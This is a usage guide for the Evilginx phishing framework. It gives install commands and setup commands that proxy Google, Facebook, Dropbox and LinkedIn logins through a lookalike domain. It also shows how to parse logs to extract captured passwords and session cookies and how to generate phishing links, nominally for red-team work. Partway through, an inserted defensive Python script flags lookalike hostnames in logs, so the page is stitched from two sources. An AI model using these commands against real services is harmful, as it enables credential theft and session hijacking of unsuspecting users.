Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. Its core runs on the Nginx HTTP server, which uses proxy_pass and sub_filter to proxy and modify HTTP content while intercepting traffic between client and server.
Evilginx provides an installation script, install.sh, that takes care of installing the whole package on any Debian wheezy/jessie machine in a fire-and-forget manner.
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
Evilginx v1.0, by @mrgretzky
usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
Enable or disable site configurations for use with the Nginx server, using the supplied Evilginx templates from the sites directory.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.
List available site configuration templates:
python evilginx.py setup -l
Listing available supported sites:
 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www
Enable the google phishing site with the preregistered phishing domain not-really-google.com:
python evilginx.py setup --enable google -d not-really-google.com
Disable facebook phishing site:
python evilginx.py setup --disable facebook
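For defenders, the template listing above shows what a proxied site looks like on the wire: the legitimate service's subdomain labels (accounts, ssl, www, m) served under a foreign registered domain. The following is an added example, not part of Evilginx or the original page, that flags such hostnames in DNS or proxy logs; the log format, the allow list of legitimate domains and all function names are assumptions made for illustration.

```python
# Added example: heuristic lookalike-host detection (not Evilginx code).
# Subdomain labels come from the `setup -l` listing; allow list and logs are constructed.
TEMPLATES = {
    "dropbox":  {"labels": {"www"},             "legit": {"dropbox.com"}},
    "google":   {"labels": {"accounts", "ssl"}, "legit": {"google.com"}},
    "facebook": {"labels": {"www", "m"},        "legit": {"facebook.com"}},
    "linkedin": {"labels": {"www"},             "legit": {"linkedin.com"}},
}

def split_host(host):
    """Return (leftmost label, naive registered domain = last two labels)."""
    parts = host.lower().rstrip(".").split(".")
    if len(parts) < 3:
        return None, ".".join(parts)
    return parts[0], ".".join(parts[-2:])

def classify(host):
    """Return the impersonated site name, or None if the host looks benign."""
    label, domain = split_host(host)
    if any(domain in t["legit"] for t in TEMPLATES.values()):
        return None  # genuine domain of a known site
    for site, t in TEMPLATES.items():
        # Brand word inside a foreign registered domain plus a template subdomain.
        if label in t["labels"] and site in domain:
            return site
    return None

def scan(log_lines):
    """Each line: '<timestamp> <client> <queried host>' (constructed format)."""
    hits = []
    for line in log_lines:
        ts, client, host = line.split()
        site = classify(host)
        if site:
            hits.append((ts, client, host, site))
    return hits

SAMPLE_LOG = [  # constructed sample data
    "2024-01-10T09:00:01Z 10.0.0.5 accounts.google.com",
    "2024-01-10T09:00:07Z 10.0.0.8 accounts.not-really-google.com",
    "2024-01-10T09:01:12Z 10.0.0.8 ssl.not-really-google.com",
    "2024-01-10T09:02:30Z 10.0.0.9 www.example.org",
    "2024-01-10T09:03:44Z 10.0.0.7 m.facebook.com",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The last-two-labels split is a simplification; for production use, resolve the registered domain against the Public Suffix List and treat a match as a lead for triage, since a phishing domain need not contain the brand name.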
Parse Nginx logs to extract intercepted login credentials and session cookies. By default, logs are saved in the logs directory, where the evilginx.py script resides. Parsing can be done automatically after you enable auto-parsing in the Setup phase.
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.
Parse logs only for google site:
python evilginx.py parse -s google
Parse logs for all available sites:
python evilginx.py parse -s all
Generate phishing URLs that you can use in your Red Team Assessments.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs: